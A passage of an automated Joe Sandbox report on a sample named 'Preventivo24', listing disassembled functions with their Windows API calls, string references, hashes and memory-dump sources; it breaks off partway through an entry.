String ID: .bat$EXE$open
API String ID: 3602564925-2898749727
Opcode ID: 0c86a33eef966d8ba4b9cbb8944dcb70ab52373db7d8a175811573e8eb4d0fe9
Instruction ID: 1123e6a680bcd6e7eebc00020a16b407158ff5d649693c509e560545676a6dda
Opcode Fuzzy Hash: 0c86a33eef966d8ba4b9cbb8944dcb70ab52373db7d8a175811573e8eb4d0fe9
Instruction Fuzzy Hash: AAB16A70A006489FDB10DBA8C858BADBBF5FF49324F148299E415AB2D1DB74AD49CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00B6C7F0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 104libraryloaderCOMMON

Download Yara Rule

APIs

SHGetSpecialFolderLocation.SHELL32(00000000,00000023,?,?,80000002,80000002,00D30080), ref: 00B6C800
LoadLibraryW.KERNEL32(Shell32.dll,?,80000002,80000002,00D30080), ref: 00B6C813
GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00B6C823
SHGetPathFromIDListW.SHELL32(?,00000000), ref: 00B6C8B2
SHGetMalloc.SHELL32(?), ref: 00B6C8FA

Strings

Shell32.dll, xrefs: 00B6C80E
SHGetSpecialFolderPathW, xrefs: 00B6C81D

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AddressFolderFromLibraryListLoadLocationMallocPathProcSpecial
String ID: SHGetSpecialFolderPathW$Shell32.dll
API String ID: 2352187698-2988203397
Opcode ID: 853d6eb030ef41179f78a21418631b3c8fd4dfcbfde270f981e0bf64f85dd0b1
Instruction ID: c4c369054d45cfbab9bcfc14c3db1b1b3d8b68846e78ecf3ca5a162f37e9afec
Opcode Fuzzy Hash: 853d6eb030ef41179f78a21418631b3c8fd4dfcbfde270f981e0bf64f85dd0b1
Instruction Fuzzy Hash: 8131C271A007019BDB24AF64DC05B7ABBF5FFD8710F14846CE889872A0EBB598858B91

Uniqueness

Uniqueness Score: -1.00%

Function 00B294D0 Relevance: 12.2, APIs: 8, Instructions: 154COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00B294DE
EndDialog.USER32(?,00000000), ref: 00B295B6

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: DialogLongWindow
String ID:
API String ID: 900524653-0
Opcode ID: c97b23c5359a375f23fc98e9d1b8b5df19e8862a575a326f976dd0cc87ae321d
Instruction ID: c87b1ef245f69efbe4bca10a6228eb91255a788ac5f60c5799221d96cc029c1d
Opcode Fuzzy Hash: c97b23c5359a375f23fc98e9d1b8b5df19e8862a575a326f976dd0cc87ae321d
Instruction Fuzzy Hash: 0341E3327003245BC7259E2CBC19BBB37D8EB45731F004B6AFD1AC27E4CAA59811D6A4

Uniqueness

Uniqueness Score: -1.00%

Function 00BEA0D8 Relevance: 12.1, APIs: 8, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00BEA282,?,?,?,?), ref: 00BEA0FC
HeapAlloc.KERNEL32(00000000,?,?,?,?), ref: 00BEA103

Part of subcall function 00BEA1CE: IsProcessorFeaturePresent.KERNEL32(0000000C,00BEA0EA,00000000,?,00BEA282,?,?,?,?), ref: 00BEA1D0

InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,00BEA282,?,?,?,?), ref: 00BEA113
VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,?,?), ref: 00BEA13A
RaiseException.KERNEL32(C0000017,00000000,00000000,00000000,?,?,?,?), ref: 00BEA14E
InterlockedPopEntrySList.KERNEL32(00000000,?,?,?,?), ref: 00BEA161
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?), ref: 00BEA174

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
String ID:
API String ID: 2460949444-0
Opcode ID: 3ce628fd0119608e4c4fa451c80d24e8159b9068ec807ae3373e1a408bb3435f
Instruction ID: 0fa5ebeb4b9e6ad28624f705f339a0636365d56304dade75b4c569376f5095dc
Opcode Fuzzy Hash: 3ce628fd0119608e4c4fa451c80d24e8159b9068ec807ae3373e1a408bb3435f
Instruction Fuzzy Hash: 3F11E231608395ABD7321B769C88F2AB7ECEB46781F0505A0F905F6251DB20EC4597B3

Uniqueness

Uniqueness Score: -1.00%

Function 00A2D600 Relevance: 11.0, APIs: 7, Instructions: 467memorysynchronizationthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

CreateThread.KERNEL32(00000000,00000000,00A2D750,00CA76F8,00000000,00000000), ref: 00A2D6BC
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00A2D6D5
CloseHandle.KERNEL32(00000000), ref: 00A2D6EB
GetProcessHeap.KERNEL32(?,00000000), ref: 00A2D8C5
HeapFree.KERNEL32(00000000,?,00000000), ref: 00A2D8CB
GetProcessHeap.KERNEL32(?,00000000), ref: 00A2D95C
HeapFree.KERNEL32(00000000,?,00000000), ref: 00A2D962

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Heap$Process$Free$CloseCreateHandleObjectSingleThreadWait
String ID:
API String ID: 3858748702-0
Opcode ID: bca7ce92ebfaeeb2282b1fd5775186bc4d7c8bff5bf4009690cb0f2b945abc87
Instruction ID: a80a303593bc516e46ff07b41dfcc23ee45e632b666af3f0322c5176746b6039
Opcode Fuzzy Hash: bca7ce92ebfaeeb2282b1fd5775186bc4d7c8bff5bf4009690cb0f2b945abc87
Instruction Fuzzy Hash: 45029E71D0025CDFDB10CFA8C854BAEBBF8BF48314F1441A9E815AB292DB74AE45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B21010 Relevance: 10.9, APIs: 7, Instructions: 423fileCOMMON

Download Yara Rule

APIs

Part of subcall function 009EB400: GetProcessHeap.KERNEL32 ref: 009EB455

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,26FBC52C,00000000), ref: 00B2117B
ReadFile.KERNEL32(00000000,00000000,00001000,?,00000000,00001000), ref: 00B211ED
ReadFile.KERNEL32(?,00000000,00001000,00000000,00000000,?,?,00000000), ref: 00B21499
CloseHandle.KERNEL32(?), ref: 00B214F7

Part of subcall function 00B21010: LoadStringW.USER32(000000A1,?,00000514,26FBC52C), ref: 00B20F68

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: File$Read$CloseCreateHandleHeapLoadProcessString
String ID:
API String ID: 2846944389-0
Opcode ID: feb979e3230abf72122dde363fd0c544d19f30b9a0c82ff52c65fa02b271db4f
Instruction ID: 126324fe65f6b670b18886081fecd2700b96408ab48ec823587027fe1891f90a
Opcode Fuzzy Hash: feb979e3230abf72122dde363fd0c544d19f30b9a0c82ff52c65fa02b271db4f
Instruction Fuzzy Hash: 91F1C271E00218DBDB10DFA8D848BAEBBF5EF59314F204659E819AB381D774AE44CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A00F00 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 289registryCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000000,00000000,Caphyon.AI.ExtUI.IEClickSoundRemover,26FBC52C), ref: 00A00FA1
GetLastError.KERNEL32 ref: 00A00FD8
RegCloseKey.ADVAPI32(?,00CA2730,00000000,00CA2730,00000000,?,80000001,00000001,00000000,AppEvents\Schemes\Apps\Explorer\Navigating\.Current,00000033), ref: 00A0124E
CloseHandle.KERNEL32(?,26FBC52C,?,?,00000000,00C167BD,000000FF,?,00CA2730,00000000,00CA2730,00000000,?,80000001,00000001,00000000), ref: 00A012DE

Strings

AppEvents\Schemes\Apps\Explorer\Navigating\.Current, xrefs: 00A01010
Caphyon.AI.ExtUI.IEClickSoundRemover, xrefs: 00A00F96

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Close$CreateErrorEventHandleLast
String ID: AppEvents\Schemes\Apps\Explorer\Navigating\.Current$Caphyon.AI.ExtUI.IEClickSoundRemover
API String ID: 1253123496-2079760225
Opcode ID: 67a18c05422dafa887da0e831d5d4898d0698ed1f263022a086cabdf2798fcd8
Instruction ID: d9b68b60ae08aa3ea3d8f3cc8fd7b0be47b3fe8f8978933f61b54fd657e9a55c
Opcode Fuzzy Hash: 67a18c05422dafa887da0e831d5d4898d0698ed1f263022a086cabdf2798fcd8
Instruction Fuzzy Hash: 16C1DF70E00289EFDB14CF68C944BEEBBB4FF55304F14829DE459A7681DB746A84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 009F2BC0 Relevance: 10.7, APIs: 7, Instructions: 223memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 009F2CC0
SysFreeString.OLEAUT32(00000000), ref: 009F2D48
GetProcessHeap.KERNEL32(-000000FE,?,?), ref: 009F2DC0
HeapFree.KERNEL32(00000000,-000000FE,?,?), ref: 009F2DC6
GetProcessHeap.KERNEL32(-000000FE,00000000,?,00000000,00000000,00000000,26FBC52C,?,?,?), ref: 009F2DF3
HeapFree.KERNEL32(00000000,-000000FE,00000000,?,00000000,00000000,00000000,26FBC52C,?,?,?), ref: 009F2DF9
SysFreeString.OLEAUT32(00000000), ref: 009F2E11

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: Free$Heap$String$Process
String ID:
API String ID: 2680101141-0
Opcode ID: cdee476a0663d4ea2d6e14e0dfd664c0e6d074894dc369fb3c5d221cc3a14c0c
Instruction ID: de413908d90ae3ab3e38c1d67de0c089d6f48dc5279ea312486c683766b47530
Opcode Fuzzy Hash: cdee476a0663d4ea2d6e14e0dfd664c0e6d074894dc369fb3c5d221cc3a14c0c
Instruction Fuzzy Hash: 10916770D0125DDFDB11DFA8C845BBEBBB8BF44314F244599E910AB291DB789A04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 009F09AA Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 212libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,.dll,00000004,?,00000000,00CA2730,00000000,00000000,00000000), ref: 009F0AB0
GetProcAddress.KERNEL32(00000000,DllGetActivationFactory), ref: 009F0AF9

Strings

DllGetActivationFactory, xrefs: 009F0AF3
.dll, xrefs: 009F0A97

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: .dll$DllGetActivationFactory
API String ID: 2574300362-1250754257
Opcode ID: f450a9773ca126cf21a30af066778aa40db99aed145f19b541ebdaccbe348d54
Instruction ID: 3835f3a7207390ed6e0733095e17774bcd405c60e701603ea5e32aafd53fabfd
Opcode Fuzzy Hash: f450a9773ca126cf21a30af066778aa40db99aed145f19b541ebdaccbe348d54
Instruction Fuzzy Hash: 7D91BA70D1024DDFDF18DFA8C899BFDBBB9AF84304F248159E611A72A2DB749A44CB40

Uniqueness

Uniqueness Score: -1.00%

Function 009FC490 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 159threadCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000E,26FBC52C,?,?,?,00000000,00000000,?), ref: 009FC4CF
GetCurrentThreadId.KERNEL32 ref: 009FC513
EnterCriticalSection.KERNEL32(00D3536C), ref: 009FC533
LeaveCriticalSection.KERNEL32(00D3536C), ref: 009FC557
CreateWindowExW.USER32(?,?,00000000,00D3536C,?,?,?,?,00000000,?,00000000), ref: 009FC5B1

Part of subcall function 00BEA23A: GetProcessHeap.KERNEL32(00000008,00000008,00000000,00B4BA31,?,?,?), ref: 00BEA23F
Part of subcall function 00BEA23A: HeapAlloc.KERNEL32(00000000,?,?,?), ref: 00BEA246

Strings

AXWIN UI Window, xrefs: 009FC63A

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: CriticalHeapSection$AllocCreateCurrentEnterErrorLastLeaveProcessThreadWindow
String ID: AXWIN UI Window
API String ID: 213679520-1592869507
Opcode ID: 27ddae69f5c5ffa8ea233ed4cd81d446803e1fd24ad56e1c29f8fa4153ab1c61
Instruction ID: ca290ebd081b5e118a25818bf8c40c2cc5f328856893b41e046ff9bcf92645e2
Opcode Fuzzy Hash: 27ddae69f5c5ffa8ea233ed4cd81d446803e1fd24ad56e1c29f8fa4153ab1c61
Instruction Fuzzy Hash: 9A51A3B260430DAFDB20DF69ED05B6ABBE8FB54764F10811AF914E7390D7B1A814CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A00C90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 150fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000,?,26FBC52E), ref: 00A00DD3
CloseHandle.KERNEL32(00000000), ref: 00A00E30

Part of subcall function 00BEAB55: AcquireSRWLockExclusive.KERNEL32(00D2E928,?,?,?,009EB4A6,00D2F53C,26FBC52C,?,?,00C1207D,000000FF,?,00B4670A), ref: 00BEAB60
Part of subcall function 00BEAB55: ReleaseSRWLockExclusive.KERNEL32(00D2E928,?,?,?,009EB4A6,00D2F53C,26FBC52C,?,?,00C1207D,000000FF,?,00B4670A), ref: 00BEAB9A

WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00A00E97
CloseHandle.KERNEL32(00000000,?), ref: 00A00EBD

Part of subcall function 00BEAB04: AcquireSRWLockExclusive.KERNEL32(00D2E928,?,?,009EB517,00D2F53C,00C75440), ref: 00BEAB0E
Part of subcall function 00BEAB04: ReleaseSRWLockExclusive.KERNEL32(00D2E928,?,009EB517,00D2F53C,00C75440), ref: 00BEAB41
Part of subcall function 00BEAB04: WakeAllConditionVariable.KERNEL32(00D2E924,?,009EB517,00D2F53C,00C75440), ref: 00BEAB4C

Strings

html, xrefs: 00A00D8C
aix, xrefs: 00A00D91

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: ExclusiveLock$AcquireCloseFileHandleRelease$ConditionCreateVariableWakeWrite
String ID: aix$html
API String ID: 3683816281-2369804267
Opcode ID: dadd37bd126abda450ccd3ea6ef01704b1e62d0ac7b66f684d110d248f4ca7fe
Instruction ID: 4764d86e61daaa9ce3886b6a02369047861d7a3c6da70765c81e78ea89e9843b
Opcode Fuzzy Hash: dadd37bd126abda450ccd3ea6ef01704b1e62d0ac7b66f684d110d248f4ca7fe
Instruction Fuzzy Hash: D46188B0900748DFEB10DFA8E949B9EBBF4BB45708F104659E005AB3D1D7F56A48CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A1AC60 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 132windowstringCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000043A,00000000,00000074), ref: 00A1ACE1
lstrcpynW.KERNEL32(?,?,00000020), ref: 00A1AD61
MulDiv.KERNEL32(?,00000048,00000000), ref: 00A1AD9E
SendMessageW.USER32(?,00000444,00000000,00000074), ref: 00A1ADD0

Strings

?, xrefs: 00A1ADA4
t, xrefs: 00A1ADAC

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: MessageSend$lstrcpyn
String ID: ?$t
API String ID: 3928028829-1995845436
Opcode ID: 0d822ddaf64c914d2144826f773aadb84f4f833d55b4f01dc3925d7290e045c8
Instruction ID: e550f611bdd234c6e4c852da650a9b7f681865f6d4bae8fea1bc3053e8bbef2a
Opcode Fuzzy Hash: 0d822ddaf64c914d2144826f773aadb84f4f833d55b4f01dc3925d7290e045c8
Instruction Fuzzy Hash: 7D517F71608345AFE721DF60DC49B9BBBE8FF49300F040919F599C62A1DB74A648CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00B1EE20 Relevance: 10.6, APIs: 7, Instructions: 118processsynchronizationCOMMON

Download Yara Rule

APIs

Wow64DisableWow64FsRedirection.KERNEL32(00000000,26FBC52C,00000000,00000000), ref: 00B1EE7B
CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00B1EEF3
GetLastError.KERNEL32 ref: 00B1EF04
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B1EF20
GetExitCodeProcess.KERNEL32(?,000000FF), ref: 00B1EF31
CloseHandle.KERNEL32(?), ref: 00B1EF3B
Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 00B1EF56

Memory Dump Source

